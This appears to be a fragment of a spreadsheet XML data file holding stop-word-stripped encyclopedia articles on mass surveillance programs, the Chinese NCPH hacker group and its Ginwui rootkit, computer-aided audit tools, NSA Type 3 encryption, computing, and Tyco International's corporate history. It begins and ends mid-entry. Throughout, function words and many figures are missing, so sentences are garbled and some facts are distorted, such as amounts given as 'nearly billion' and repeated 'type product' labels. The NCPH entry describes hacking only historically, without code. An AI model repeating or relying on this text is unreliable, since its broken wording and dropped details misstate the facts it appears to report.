anonymizer, software system attempts make network activity untraceable computer surveillance workplace cyber spying datacasting, means broadcasting files pages using radio waves, allowing receivers near total immunity traditional network surveillance techniques. differential privacy, method maximize accuracy queries statistical databases minimizing chances violating privacy individuals. echelon, signals intelligence (sigint) collection analysis network operated behalf australia, canada, zealand, united kingdom, united states, also known auscannzukus five eyes ghostnet, large-scale cyber spying operation discovered march 2009 list government surveillance projects mass surveillance china's golden shield project mass surveillance australia mass surveillance china mass surveillance east germany mass surveillance india mass surveillance north korea mass surveillance united kingdom mass surveillance united states surveillance surveillance united states government: 2013 mass surveillance disclosures, reports international partners' mass surveillance foreign nationals u.s. citizens bullrun (code name), highly classified program preserve ability eavesdrop encrypted communications influencing weakening encryption standards, obtaining master encryption keys, gaining access data encrypted either agreement, force law, computer network exploitation (hacking) carnivore, u.s. federal bureau investigation system monitor email electronic communications cointelpro, series covert, times illegal, projects conducted aimed u.s. domestic political organizations communications assistance enforcement computer internet protocol address verifier (cipav), data gathering tool used u.s. federal bureau investigation (fbi) dropmire, secret surveillance program aimed surveillance foreign embassies diplomatic staff, including nato allies magic lantern, keystroke logging software developed u.s. federal bureau investigation mass surveillance united states call database, database containing metadata hundreds billions telephone calls made u.s. warrantless surveillance (2001–07) whistleblowers: william binney, thomas andrews drake, mark klein, edward snowden, thomas tamm, russ tice spying united nations leaders united states diplomats stellar wind (code name), code name information collected president's surveillance program tailored access operations, nsa's hacking program terrorist surveillance program, electronic surveillance program total information awareness, project defense advanced research projects agency (darpa) tempest, codename studies unintentional intelligence-bearing signals which, intercepted analyzed, disclose information transmitted, received, handled, otherwise processed information-processing equipment references external links "selected papers anonymity", free haven project, accessed september 2011.</t>
  </si>
  <si>
    <t>Network Crack Program Hacker Group</t>
  </si>
  <si>
    <t>network crack program hacker group (ncph group) chinese hacker group based zigong sichuan province. while group first gained notoriety hacking hacker association websites china, attacks grew sophistication notoriety 2006 received international media attention early 2007. idefense linked ginwui rootkit, developed leader dailin (wicked rose) attacks department defense june 2006. idefense linked group many zero-day hacker proof-of-concept codes used attacks period days summer 2006. they also known remote-network-control programs offer download. wicked rose announced blog post group paid work, group's sponsor unknown. members group four core members 2006, wicked rose, kungbim, charles, rodag, approximately members total. group's current membership unknown. wicked rose wicked rose, also known meigui (玫瑰), pseudonym chinese hacker dailin. first noted hacker "patriotic" attacks 2001. 2005, wicked rose contracted sichuan military command communication department instructed participate chengdu military command network attack/defense competition. after winning local competition, received month intense training simulating attacks, designing hacking tools, drafting network-infiltration strategies. team represented sichuan military command competition provinces went win. wicked rose also credited development ginwui rootkit used attacks department defense 2006.as group's leader, responsible managing relationships sponsors paying ncph members work. april 2009 arrested committing distributed denial service attacks hackbase, hackerxfiles, 3800hk, possibly purpose committing blackmail. organizations attacked collected information attack turned public security department. authorities conducted investigation shut website. hackbase reported wicked rose arrested faces 71/2 years prison. controversy group expelled hacker 2006. although cause unknown, group ejected soon zero-day attacks publicly disclosed. coding expert within group. associates former ncph member associates chinese hacker li0n, founder honker union china (huc). wicked rose credits chinese hacker whg, also known "fig" developers ginwui rootkit. expert malicious code. security firms researching wicked rose's activities connected chinese hacker group evil security team. activities group known remote-network-control programs offer free website exploitation zero-day vulnerabilities microsoft office suite products. after founding 2004, group earned reputation among hacking groups hacking hacker association websites china. ginwui rootkit wicked rose creator ginwui rootkit. code support posts chinese hacker message boards, also available ncph blog.security researchers discovered rootkit 2006 attackers utilized attacks japan. attackers introduced attack department defense entity. they used different versions rootkit attacks june 2006.according f-secure, ginwui fully featured backdoor rootkit characteristics." distributed word documents. backdoor ginwui creates allows controlling hacker control certain processes compromised computer including ability create, read, write, delete, search files directories, access modify registry, manipulate services, start kill processes, information infected computer, lock, restart, shutdown windows, among activities.according information systems security, rootkit also obtains kernel-level access "...trap several functions modify information passed user." microsoft office exploits idefense links ncph many zero-day proof-of-concept codes used attacks microsoft office products period days summer 2006 malware developed wicked rose available public domain time. group graduated early attacks exploiting microsoft word, 2006, also using power point excel attacks. ncph utilizes exploits spear phishing attacks. spear phishing blog, wicked rose discussed preference spear phishing attacks. first, collection phase information gathered using open source information employee databases mailboxes company's system. also conduct analysis user id's allows track understand activities. finally conducts attack using information collected someone likely open infected document.spear phishing attacks attributed ncph increased sophistication time. while phishing attacks beginning 2006 targeted large numbers employees, attack attributed group later year targeted individual company using socially engineered emails infected power point documents. sponsorship after winning military network attack/defense competition, group obtained sponsor paid 2000 month. idefense believes sponsor likely people's liberation army (pla) definitive evidence support claim. after 2006 attacks took place, sponsor increased 5000 rmb. group's current sponsor unknown. media coverage time reporter simon elegant interviewed eight members group december 2007 part article chinese government cyber operations government. during interview members referred using code names. security firm idefense published reports group exploits devoted webinar group, capabilities, relationships chinese hackers. scott henderson, chinese linguistics chinese hacker expert, also devoted several blog posts group ongoing activities. blogging four core members group blogged activities point another. group's blog ncph.net also offered network-infiltration programs download. scott henderson describes wicked rose's early blog posts "the revealing damning thing ever seen chinese hacker write." after interview time reporter wicked rose took group's blog blog. july 2008 group's blog returned, modified content. withered rose also began blogging again, saying busy time blog down, allows time blog. chinese officials removed blogs arrest april 2009. rodag also blogs, recent post august 2008. last post vulnerabilities attackers used exploit user's desktop. also wicked rose honker union references external links link idefense webcast (internet explorer only) dark visitor enemies firewall</t>
  </si>
  <si>
    <t>Computer-aided audit tools</t>
  </si>
  <si>
    <t>computer-assisted audit tool (caats) computer-assisted audit tools techniques (caats) growing field within audit profession. caats practice using computers automate audit processes. caats normally include using basic office productivity software spreadsheets, word processors text editing programs advanced software packages involving statistical analysis business intelligence tools. also dedicated specialized software available (see below). caats become synonymous data analytics audit process. traditional auditing caats traditional audit example traditional method auditing allows auditors build conclusions based upon limited sample population, rather examination available large sample data. caatts alternative caatts, caats, addresses problems. caatts, commonly used, practice analyzing large volumes data looking anomalies. well-designed caatts audit sample, rather complete review transactions. using caatts auditor extract every transaction business unit performed period reviewed. auditor test data determine problems data. traditional audit caatts specific risks another advantage caatts allows auditors test specific risks. example, insurance company want ensure claims policy terminated. using traditional audit techniques risk would difficult test. auditor would "randomly select" "statistically valid" sample claims (usually claims processed policy terminated). since insurance company might process millions claims odds 30–50 "randomly selected" claims occurred policy terminated extremely unlikely. using caatts auditor select every claim date service policy termination date. auditor determine claims inappropriately paid. were, auditor figure controls prevent failure. real-life audit, caatts auditor noted several claims paid policies terminated. using caatts auditor able identify every claim paid exact dollar amount incorrectly paid insurance company. furthermore, auditor able identify reason claims paid. reason paid participant paid premium. insurance company, received payment, paid claims. then paying claim participant's check bounced. when check bounced, participant's policy retrospectively terminated, claim still paid costing company hundreds thousands dollars year. which looks better audit report: "audit reviewed transactions noted transaction processed incorrectly" "audit used caatts tested every transaction past year. noted exceptions wherein company paid dollars terminated policies." however, caatts driven review limited data saved files accordance systematic pattern. much data never documented way. addition saved data often contains deficiencies, poorly classified, easy get, might hard become convinced integrity. present caatts complement auditor's tools techniques. certain audits, caatts can't used all. also audits simply can't made care efficiently without caatts. specialized software general terms, caatts refer computer program utilized improve audit process. generally, however, used refer data extraction analysis software. this would include programs data analysis extraction tools, spreadsheets (e.g. excel), databases (e.g. access), statistical analysis (e.g. sas), generalized audit software (e.g. acl, arbutus, eas), business intelligence (e.g. crystal reports business objects), etc. benefits audit software include: they independent system audited read-only copy file avoid corruption organization’s data. many audit-specific routines used sampling. provides documentation test performed software used documentation auditor’s work papers.audit specialized software perform following functions: data queries. data stratification. sample extractions. missing sequence identification. statistical analysis. calculations. duplicate transaction identification. pivot table creation. cross tabulation. caats education professional development caats courses caats fundamental tool used auditors. this tool facilitates make search irregularities given data. with help tool, auditors accountants firm able provide analytical results. these tools used throughout every business environment also industry sectors too. with help computer-assisted audit techniques, forensic accounting analysis done. it’s really helpful tool helps firm auditor work efficient productive manner. working caats, essential accountant auditor select right data, selection process much tricky, need professional after selecting right data, import caats, tool automatically generate analytical data. this tool contributes efficiency auditors. fundamental course outline include: computer auditing overview legal ethical issues computer auditors understanding caats computer auditing project planning data access skill knowledge data verify skill knowledge data analysis skill knowledge audit finding report skill knowledge caats certification program there several certification programs various caats vendors professional associations following: international certified caats practitioner (iccp): established international computer auditing education association (icaea). acl™ certified data analyst (acda): established services ltd. certified idea data analyst (cida): established caseware analytics. jacksoft certified caats practitioner (jccp): established jacksoft commerce automation ltd. other uses caats addition using data analysis software, auditor uses caats throughout audit following activities performing data analysis: creation electronic work papers keeping electronic work papers centralized audit file database allow auditor navigate current archived working papers ease. database make easier auditors coordinate current audits ensure consider findings prior related projects. additionally, auditor able electronically standardize audit forms formats, improve quality consistency audit working papers. fraud detection caats provide auditors tools identify unexpected unexplained patterns data indicate fraud. whether caats simple complex, data analysis provides many benefits prevention detection fraud. caats assist auditor detecting fraud performing creating following, analytical tests evaluations financial information made studying plausible relationships among financial non-financial data assess whether account balances appear reasonable 329). examples include ratio, trend, benford's tests. data analysis reports reports produced using specific audit commands filtering records joining data files. continuous monitoring continuous monitoring ongoing process acquiring, analyzing, reporting business data identify respond operational business risks. auditors ensure comprehensive approach acquire, analyze, report business data, must make certain organization continuously monitors user activity computer systems, business transactions processes, application controls. curb stoning surveys curb stoning term instances surveyor completes survey form making data. because data conform benford's law, practice detected using caatts provide capability performing tests. note acronyms caatts caats caatts caats used interchangeably. while caats emerged common spelling, caatts precise acronym. acronym caatts solves problems defining acronym. caats means: computer aided assisted) audit techniques tools techniques) first different meanings depending uses term. using term caatts, clearly incorporating "tools" "techniques." comparison tools comparison specification comparison analysis features following table compares features specialized computer-aided audit tools. table several fields, follows: product name: product's name; sometime includes edition certain edition targeted. analysis: specifies whether product supports making analysis (stratification date). benford's law: specifies whether product supports finding abnormal distribution specific digits accordingly benford's law. calculated field: specifies whether product supports adding extra calculated fields table/file. usually implies using expression builder feature build expressions defining field calculation. drill-down (table): specifies whether product supports drill-down features zooming (filtering) selected rows table. drill-down (pivot): specifies whether product supports drill-down features pivot table. matching: specifies whether product supports finding matching items specific field table/file. example, could used find duplicate billings invoices within sales ledger. matching (fuzzy): specifies whether product supports finding matching items specific field using fuzzy comparison. instance, values compared similar exactly (e.g., using levenshtein matching). sample (random): specifies whether product supports selecting random sample rows table/file (population). sample (monetary unit): specifies whether product supports selecting monetary unit sample rows table/field (population). this also known dollar-unit sampling (when values u.s. currency). sequence check (gap): specifies whether product supports find (identify) gabs sequences) specific field. example, finding broken sequence invoice number sequence. sort field: specifies whether product supports sorting (indexing) specific field (column). sorting helps identifying blank/empty values excessive (out-of-band) values. sort multiple fields: specifies whether product supports sorting multiple fields (columns). statistics: specifies whether product supports calculation presentation various statistics specific field (e.g., values numeric field total number positive numbers, total number negative numbers, average value (balance), etc.) stratification: specifies whether product supports stratification number (amount) values specified intervals. splits population strata (intervals) aggregates (summarizes) values. used find largest, smallest average amount transactions (rows). total row: specifies whether products supports displaying total table/file, e.g. accumulated numerical value. comparison features audit log: specifies whether product logs activity performed user (the auditor) later reference (e.g., inclusion audit report). data graph: specifies whether product provides graphs results. export (csv): specifies whether product support exporting selected rows comma-separated values formatted file. usually also implies capability clipboard format) pasting applications supporting pasting files excel. export (dbf): specifies whether product support exporting (saving) selected rows dbase table file. export (excel): specifies whether product support exporting (saving) selected rows excel file. usually also implies capability copy rows clipboard format) pasting excel. comparison data preparation features append/merge: specifies whether product combine tables/files identical fields single table/file. example, could merge years accounts payable tables/files single table/file. import wizard: specifies whether product provides import wizard assist importing (interpretation, conversion, formatting) data analysis. import (csv): specifies whether product supports import data comma-separated values formatted file. import (dbf): specifies whether product supports import data dbase files. import (excel): specifies whether product supports import data microsoft excel workbook file. note different excel format versions apply. import (saf-t): specifies whether product supports import data oecd saf-t file. saf-t based general import cover feature although direct saf-t import improves user experience. note different saf-t format versions apply. import (sie): specifies whether product supports import data format file. import (xbrl-gl): specifies whether product supports import data xbrl file. xbrl-gl based general import cover feature although direct xbrl-gl import improves user experience. note different xbrl-gl format versions apply. also generalized audit software information technology audit separation duties external links performance comparison audit automation toolsfórum references information technology control audit; frederick gallegos, sandra senft, al.; edition isbn 0-8493-2032-1 internal audit: efficiency automation; david coderre.; edition isbn 978-0-470-39242-3</t>
  </si>
  <si>
    <t>Type 3 encryption</t>
  </si>
  <si>
    <t>u.s. national security agency (nsa) ranks cryptographic products algorithms certification called product types. product types defined national information assurance glossary (cnssi 4009) defines type products. type product type product device system certified cryptographically securing classified u.s. government information. type product defined cryptographic equipment, assembly component classified certified encrypting decrypting classified sensitive national security information appropriately keyed. developed using established business processes containing approved algorithms. used protect systems requiring stringent protection mechanisms. they available u.s. government users, contractors, federally sponsored non-u.s. government activities subject export restrictions accordance international traffic arms regulations. type certification rigorous process includes testing formal analysis (among things) cryptographic security, functional security, tamper resistance, emissions security (emsec/tempest), security product manufacturing distribution process. type product type product unclassified cryptographic equipment, assemblies, components, endorsed nsa, telecommunications automated information systems protection national security information, defined cryptographic equipment, assembly, component certified encrypting decrypting sensitive national security information appropriately keyed. developed using established business processes containing approved algorithms. used protect systems requiring protection mechanisms exceeding best commercial practices including systems used protection unclassified national security information. type product type product device sensitive, unclassified (sbu) information non-national security systems, defined unclassified cryptographic equipment, assembly, component used, appropriately keyed, encrypting decrypting unclassified sensitive u.s. government commercial information, protect systems requiring protection mechanisms consistent standard commercial practices. developed using established commercial standards containing nist approved cryptographic algorithms/modules successfully evaluated national information assurance partnership (niap). approved encryption algorithms include three-key triple des, (although also used nsa-certified type products). approvals des, two-key triple skipjack withdrawn 2015. type product type product encryption algorithm registered nist federal information processing standard (fips), defined unevaluated commercial cryptographic equipment, assemblies, components neither nist certify government usage. these products typically delivered part commercial offerings commensurate vendor’s commercial practices. these products contain either vendor proprietary algorithms, algorithms registered nist, algorithms registered nist published fips. also encryption systems, historically oriented list encryption products (most type cryptography algorithms participated development suite cryptography suite cryptography references parts article derived federal standard 1037c, national information systems security glossary, 1452.</t>
  </si>
  <si>
    <t>Computing</t>
  </si>
  <si>
    <t>computing goal-oriented activity requiring, benefiting from, creating computing machinery. includes study experimentation algorithmic processes, development hardware software. computing scientific, engineering, mathematical, technological social aspects. major computing disciplines include computer engineering, computer science, cybersecurity, data science, information systems, information technology software engineering.the term "computing" also synonymous counting calculating. earlier times, used reference action performed mechanical computing machines, that, human computers. history history computing longer history computing hardware modern computing technology, includes history methods intended paper chalk slate) without tables. computing intimately tied representation numbers, though mathematical concepts necessary computing existed numeral systems. these concepts include one-to-one correspondence (the basis counting), comparison standard (used measurement), 3-4-5 right triangle device assuring right angle).the earliest known tool computation abacus, thought invented babylon circa 2400 original style usage lines drawn sand pebbles. abaci, modern design, still used calculation tools today. this first known calculation preceding greek methods 2,000 years.the first recorded proposal using digital electronics computing 1931 paper "the thyratrons high speed automatic counting physical phenomena" wynn-williams. claude shannon's 1938 paper symbolic analysis relay switching circuits" introduced idea using electronics boolean algebraic operations. concept field-effect transistor proposed julius edgar lilienfeld 1925. john bardeen walter brattain, working william shockley bell labs, built first working transistor, point-contact transistor, 1947. 1953, university manchester built first transistorized computer, called transistor computer. however, early junction transistors relatively bulky devices difficult mass-produce, limited number specialised applications. metal–oxide–silicon field-effect transistor (mosfet, transistor) invented mohamed atalla dawon kahng bell labs 1959. first truly compact transistor could miniaturised mass-produced wide range uses. mosfet made possible build high-density integrated circuit chips, leading known computer revolution microcomputer revolution. computer computer machine manipulates data according instructions called computer program. program executable form computer directly execute instructions. program human-readable source code form, enables programmer study develop sequence steps known algorithm. because instructions carried different types computers, single source instructions converts machine instructions according type.the execution process carries instructions computer program. instructions express computations performed computer. they trigger sequences simple actions executing machine. those actions produce effects according semantics instructions. computer hardware computer hardware includes physical parts computer, including central processing unit, memory input/output. computational logic computer architecture topics field computer hardware. computer software computer software, "software", collection computer programs related data, provides instructions computer. software refers computer programs data held storage computer. programs, procedures, algorithms, well documentation concerned operation data processing system. program software performs function program implements, either directly providing instructions computer hardware serving input another piece software. term coined contrast term hardware (meaning physical devices). contrast hardware, software intangible.software also sometimes used narrow sense, meaning application software only. system software system software, systems software, computer software designed operate control computer hardware, provide platform running application software. system software includes operating systems, utility software, device drivers, window systems, firmware. frequently used development tools compilers, linkers, debuggers classified system software. system software middleware manage integrate computer's capabilities, typically directly apply performance tasks benefit user, unlike application software. application software application software, also known "application" "app", computer software designed help user perform specific tasks. examples include enterprise software, accounting software, office suites, graphics software media players. many application programs deal principally documents. apps bundled computer system software, published separately. some users satisfied bundled apps need never install additional applications. system software manages hardware serves application, turn serves user. application software applies power particular computing platform system software particular purpose. some apps, microsoft office, developed multiple versions several different platforms; others narrower requirements generally referred platform example, "geography application windows" "android application education" "linux gaming". applications platform increase desirability platform popularity application, known killer applications. computer network computer network, often simply referred network, collection hardware components computers interconnected communication channels allow sharing resources information. when least process device able send receive data least process residing remote device, devices said network. networks classified according wide variety characteristics medium used transport data, communications protocol used, scale, topology, organizational scope. communications protocols define rules data formats exchanging information computer network, provide basis network programming. well-known communications protocol ethernet, hardware link layer standard ubiquitous local area networks. another common protocol internet protocol suite, defines protocols internetworking, i.e. data communication multiple networks, host-to-host data transfer, application-specific data transmission formats.computer networking sometimes considered sub-discipline electrical engineering, telecommunications, computer science, information technology computer engineering, since relies upon theoretical practical application disciplines. internet internet global system interconnected computer networks standard internet protocol suite (tcp/ip) serve billions users. this includes millions private, public, academic, business, government networks, ranging scope local global. these networks linked broad array electronic, wireless optical networking technologies. internet carries extensive range information resources services, inter-linked hypertext documents world wide infrastructure support email. computer programming computer programming process writing, testing, debugging, maintaining source code documentation computer programs. this source code written programming language, artificial language often restrictive natural languages, easily translated computer. programming used invoke desired behavior (customization) machine.writing high quality source code requires knowledge computer science domain domain application used. highest-quality software thus often developed team domain experts, specialist area development. however, term programmer apply range program quality, hacker open source contributor professional. also possible single programmer computer programming needed generate proof concept launch "killer" application. computer programmer programmer, computer programmer, coder person writes computer software. term "computer programmer" refer specialist area computer programming generalist writes code many kinds software. practices professes formal approach programming also known programmer analyst. programmer's primary computer language c++, java, lisp, python, etc.) often prefixed titles, work environment often prefix titles "web". term "programmer" used refer software developer, software engineer, computer scientist, software analyst. however, members professions typically possess software engineering skills, beyond programming. computer industry computer industry made businesses involved developing computer software, designing computer hardware computer networking infrastructures, manufacturing computer components providing information technology services, including system administration maintenance.the software industry includes businesses engaged development, maintenance publication software. industry also includes software services, training, documentation, consulting. sub-disciplines computing computer engineering computer engineering discipline integrates several fields electrical engineering computer science required develop computer hardware software. computer engineers usually training electronic engineering electrical engineering), software design, hardware-software integration, rather software engineering electronic engineering. computer engineers involved many hardware software aspects computing, design individual microprocessors, personal computers, supercomputers, circuit design. this field engineering includes design hardware within domain, also interactions hardware context operates. software engineering software engineering (se) application systematic, disciplined quantifiable approach design, development, operation, maintenance software, study approaches. that application engineering software. using insights conceive, model scale solution problem. first reference term 1968 nato software engineering conference, intended provoke thought regarding perceived "software crisis" time. software development, widely-used generic term, necessarily subsume engineering paradigm. generally accepted concepts software engineering engineering discipline specified guide software engineering body knowledge (swebok). swebok become internationally accepted standard iso/iec 19759:2015. computer science computer science computing science (abbreviated comp sci) scientific practical approach computation applications. computer scientist specializes theory computation design computational systems.its subfields divided practical techniques implementation application computer systems, purely theoretical areas. some, computational complexity theory, studies fundamental properties computational problems, highly abstract, others, computer graphics, emphasize real-world applications. others focus challenges implementing computations. example, programming language theory studies approaches description computations, study computer programming investigates programming languages complex systems. field human–computer interaction focuses challenges making computers computations useful, usable, universally accessible humans. cybersecurity field cybersecurity pertains protection computer systems networks. this includes information data privacy, preventing disruption services prevention theft damage hardware, software data. data science data science field uses scientific computing tools extract information insights data, driven increasing volume availability data. data mining, data, statistics machine learning interwoven data science. information systems information systems (is) study complementary networks hardware software (see information technology) people organizations collect, filter, process, create, distribute data. acm's computing careers describes majority [degree] programs located business schools; however, different names management information systems, computer information systems, business information systems. degrees combine business computing topics, emphasis technical organizational issues varies among programs. example, programs differ substantially amount programming required." study bridges business computer science, using theoretical foundations information computation study various business models related algorithmic processes within computer science discipline. field computer information systems (cis) studies computers algorithmic processes, including principles, software hardware designs, applications, impact society emphasizes functionality design. information technology information technology (it) application computers telecommunications equipment store, retrieve, transmit manipulate data, often context business enterprise. term commonly used synonym computers computer networks, also encompasses information distribution technologies television telephones. several industries associated information technology, including computer hardware, software, electronics, semiconductors, internet, telecom equipment, e-commerce computer services. research emerging technologies dna-based computing quantum computing areas active research computing hardware software, development quantum algorithms. potential infrastructure future technologies includes origami photolithography quantum antennae transferring information traps. 2011, researchers entangled qubits. fast digital circuits, including based josephson junctions rapid single flux quantum technology, becoming nearly realizable discovery nanoscale superconductors.fiber-optic photonic (optical) devices, already used transport data long distances, starting used data centers, along semiconductor memory components. this allows separation optical interconnects. created integrated circuit electronic optical information processing chip. this denoted "cmos-integrated nanophotonics" (cinp). benefit optical interconnects motherboards, formerly required certain kind system chip (soc), move formerly dedicated memory network controllers motherboards, spreading controllers onto rack. this allows standardization backplane interconnects motherboards multiple types socs, allows timely upgrades cpus.another field research spintronics. spintronics provide computing power storage, without heat buildup. some research done hybrid chips, combine photonics spintronics. there also research ongoing combining plasmonics, photonics, electronics. cloud computing cloud computing model allows computing resources, servers applications, without need interaction owner resources user. typically offered service, making example software service, platforms service, infrastructure service, depending functionality offered. characteristics include on-demand access, broad network access, capability rapid scaling. allows individual users small business benefit economies scale. area interest field potential support energy efficiency. allowing thousands instances computation occur single machine instead thousands individual machines could help save energy. could also ease transition renewable energy source, since would suffice power server farm renewable energy, rather millions homes offices.however, centralized computing model poses several challenges, especially security privacy. current legislation sufficiently protect users companies mishandling data company servers. this suggests potential legislative regulations cloud computing tech companies. quantum computing quantum computing area research brings together disciplines computer science, information theory, quantum physics. while idea information part physics relatively new, appears strong information theory quantum mechanics. whereas traditional computing operates binary system ones zeros, quantum computing uses qubits. qubits capable superposition, i.e. states zero, simultaneously. thus, value qubit changes depending measured. this trait qubits known quantum entanglement, core idea quantum computing allows quantum computers large scale computations. quantum computing often used scientific research cases traditional computers computing power necessary calculations, molecular modeling. large molecules reactions complex traditional computers calculate, computational power quantum computers could provide tool perform calculations. also computational thinking creative computing electronic data processing enthusiast computing index history computing articles instruction architecture lehmer sieve list computer term etymologies mobile computing scientific computing references external links foldoc: free on-line dictionary computing</t>
  </si>
  <si>
    <t>Tyco International</t>
  </si>
  <si>
    <t>tyco international security systems company incorporated republic ireland, operational headquarters princeton, jersey, united states (tyco international (us) inc.). tyco international composed major business segments: security solutions fire protection. january 2016, johnson controls announced would merge tyco, businesses tyco johnson controls would combined tyco international plc, renamed johnson controls international plc. merger completed september 2016. timeline 1960s founded arthur rosenberg 1960, tyco, inc. formed investment holding company segments: tyco semiconductors materials research laboratory. first years operation, company focused primarily governmental research military experiments private sector.in 1962, business incorporated massachusetts refocused high-tech materials science energy conservation products. years later 1964, company went public began fill gaps development distribution network acquiring mule battery products, first tyco's acquisitions next four years. 1970s 1970s, tyco boomed, beginning decade consolidated sales stockholder equity reaching million million, respectively.in 1974, tyco listed york stock exchange (nyse).by decade, tyco larger diverse corporation sales topping $500 million worth nearly $140 million. tyco's success largely attributed ambitious acquisitions simplex technology, grinnell fire protection systems, armin plastics ludlow corporation. 1980s following aggressive acquisition period 1970s, tyco management focused early 1980s organizing newly acquired subsidiaries. tyco divided company three business segments (fire protection, electronics, packaging), implemented strategies achieve significant market share tyco's product lines.once organized, tyco returned strategy growth acquisition later part decade acquiring grinnell corporation, allied tube conduit, mueller company. tyco reorganized subsidiaries four segments: electrical electronic components, healthcare specialty products, fire security services flow control. this reorganization remained place 2007 current breen spun electrical healthcare segments create three publicly independent companies. 1990s 1992, dennis kozlowski became tyco international, and, next several years, company adopted aggressive acquisition strategy, eventually acquiring accounts) 3,000 companies 1991 2001.major acquisitions 1990s included: wormald international limited, neotecha, hindle/winn, classic medical, uni-patch, promeon, preferred pipe, kendall international co., tectron tube, unistrut, earth technology corporation, professional medical products, inc., thorn security, carlisle, watts waterworks businesses, sempell, electrostar, american pipe tube, submarine systems inc., keystone, inbrand, sherwood davis geck, united states surgical, wells fargo alarm, amp, raychem, glynwed, temasa central sprinkler designs.to reflect tyco's global presence following abundant acquisitions, company's name changed tyco laboratories, inc. tyco international ltd. 1993. addition, tyco launched pipeline, internal employee newsletter; title later changed tyco world. final issue published april–may 2006. 1996, tyco added standard poor's composite index, consists publicly traded companies united states largest market capitalization.in 1997, tyco acquired at&amp;t submarine systems, gaining research development fleet assets, along manufacturing capability produce repeaters transmission equipment. these additional capabilities, combined cable manufacturing tyco integrated cables systems newington, hampshire, established tyco telecommunications world's first vertically integrated global optical network supplier, capable developing technology manufacturing components, designing, building maintaining systems. july 1997, tyco merged reverse takeover smaller publicly traded security services company named limited, controlled michael ashcroft. part deal, tyco international ltd. massachusetts became wholly owned subsidiary limited, simultaneously changed name tyco international ltd., retaining former tyco stock symbol, tyc. merger moved tyco's incorporation bermuda, haven, headquartered colonial capital hamilton. subsidiary named security systems also formed merger, later changed name security services.in 1999, tyco acquired companies buyout. they acquired electronics connector manufacturer inc., $12.22 billion materials science company, raychem corp., $1.4 billion.in 2000, tyco closed year spinning deep-sea fiber-optic cable-laying division purchased at&amp;t tyco submarine systems initial public offering. 2000s 2000–2001 tyco's aggressive acquisition strategy continued early 2000s, purchases general surgical innovations, siemens electromechanical components, cable praegitzer. additions gave tyco ending fiscal 2000 year revenue exceeding billion, nearly billion coming sale subsidiary common shares.in fiscal 2000 year, tyco acquired mallinckrodt inc. simplex time recorder company later merged january 2002 grinnell fire protection form indirect wholly owned subsidiary, simplexgrinnell world's largest fire protection company. year ended september 2000, company's book value exceeded $141 billion. however, company doubled long-term debt, billion.in october 2001, engineered products services segment acquired century tube corp, followed buying water power technologies november 2001. following november, tyco electronics segment acquired transpower technologies. next month, plastics adhesives segment acquired linq industrial fabrics, inc. early 2002 with complexity growing within tyco's subsidiaries, january 2002, tyco announced plan split business four separate companies. however, plan abandoned downgrade credit rating significant drop stock price. later month, tyco's acquisitions continued throughout segments: electronics segment acquired communications instruments, inc. healthcare segment bought paragon trade brands. engineered products services segment acquired clean systems. fire security segment tyco acquired sbc/smith alarm systems, group, sensormatic electronics corp.for acquisitions tyco made 2002, company also incurred extensive losses. during first quarter 2002, following recession previous year, electronics segment recorded charge billion, related massive overcapacity fiber-optic cable, turn affected in-process buildout tyco's global undersea fiber-optic network, known tyco global network (tgn). generated loss fiscal 2002 billion, restructuring charge $500 million. construction eventually completed 2003.the electronics segment also recorded billion restructuring charges 2002 inventory write-down facility closures. addition, 2002 struck tyco goodwill impairments, first $500 million second quarter, fiber-cable overcapacity issue corporate problems. second, costing electronics segment $250 million related sales issues power systems, electrical contracting services, printed circuit group. make tyco's financial matters worse, company lost quarter billion investment 2002 flag telecom holdings ltd.in effort losses, july 2002, tyco divested tyco capital business initial public offering, sale 100% common shares group incorporated. recorded divestment discontinued operations 2002, billion loss, almost billion impairment charge. that month, tyco healthcare segment also divested surgical dynamics, inc.for year ended september 2002, tyco revenue rose nearly billion. however, suffered billion loss year, included asset impairment write-down billion, losses nearly billion restructuring charges, billion goodwill impairment charges. all, charges totaled nearly billion loss year. stock price plummeted.to financial woes company, midway fiscal 2002 year, tyco became embroiled massive scandal involving excesses former chairman ceo, dennis kozlowski, senior management team. kozlowski resigned former tyco john fort became interim board directors completed search permanent replacement. early 2002, tyco alleged violation securities exchange 1934 nondisclosure major financial information artificially inflating earnings. june 2002, tyco filed federal suit mark swartz, tyco's former executive vice president chief corporate counsel, frank walsh, former director. late 2002 july 2002, edward breen appointed president, ceo, chairman tyco initial three-year term. breen previously president motorola since promotion company january 2002.breen made immediate impact tyco gutting existing board directors leadership team worked kozlowski replacing managers. month appointment, tyco announced appointment john krol lead director board directors priority improving tyco's corporate governance.breen made additional changes, appointing david fitzpatrick executive vice president cfo, william lytton, executive vice president general counsel, eric pillmore senior vice president corporate governance.with management team place, tyco began two-phase internal investigation former kozlowski. investigation tyco filing federal lawsuits. september december 2002, tyco filed federal suit kozlowski arbitration claim former director, mark swartz. swartz, however, failed submit american arbitration association tyco followed federal suit him.on november 2002, state jersey took action scandal, filing federal suit tyco former personnel, charges part violating jersey racketeer influenced corrupt organizations (rico) statute, stemming kozlowski scandal. result scandal, tyco former directors officers named defendants dozen securities class-action lawsuits. most cases consolidated transferred united states district court district hampshire filed court-appointed lead plaintiffs january 2003, case tyco international securities litigation, citing causes action securities 1933 securities exchange 1934. that march tyco made motion dismiss, granted part year later, october 2004. 2003 february 2003, scandal continued play courts, tyco personnel named defendants amended consolidated class-action federal suit brought behalf retirees retirement savings investment plans, citing causes employee retirement income security act. december 2004, hampshire court granted part tyco's motion dismiss.removed scandal, tyco made internal moves within company 2003 forming plastics adhesives business segment, former piece healthcare specialty products segment. other changes came tyco's corporate governance: tyco's board re-elected john krol lead director, tyco reorganized assignments board's committee, adopted board governance principles delegation authority policy strengthened control cash disbursements within company.the final improvement corporate governance came guide ethical conduct. guide produced advise employees correct procedures warn unethical practices behavior. tyco employees required take brief ethics course sign annual ethics statement. 2004 effort enhance consumer awareness revive corporate image, june 2004, tyco launched global print-advertising campaign, "tyco vital part world." tyco also began divestiture program following review core businesses. part plan sell tgn, entirely written value. agreement sale reached november.in second quarter 2004, security sold sonitrol.in all, within divestiture program, fiscal year 2004, tyco divested businesses liquidated four non-core businesses, primarily within fire security segment.in september 2004, tyco also divested electrical contracting services electronics segment, decrease sales. after september tyco divested additional seven non-core businesses, bringing program aggregate proceeds $500 million year.by 2004, tyco employed 260,000 people, two-thirds outside united states. revenue strongly, billion first time. once strengthening euro dollar helped tyco, accounting primarily $1.5 billion increase revenue. various charges, losses, debt repayment totaled nearly billion 2004, however, profitability tripled year almost billion. 2005 videsh sanchar nigam limited (vsnl), india acquired tyco global network (tgn) tyco international $130 million. chief stockholder vsnl india's tata group, also 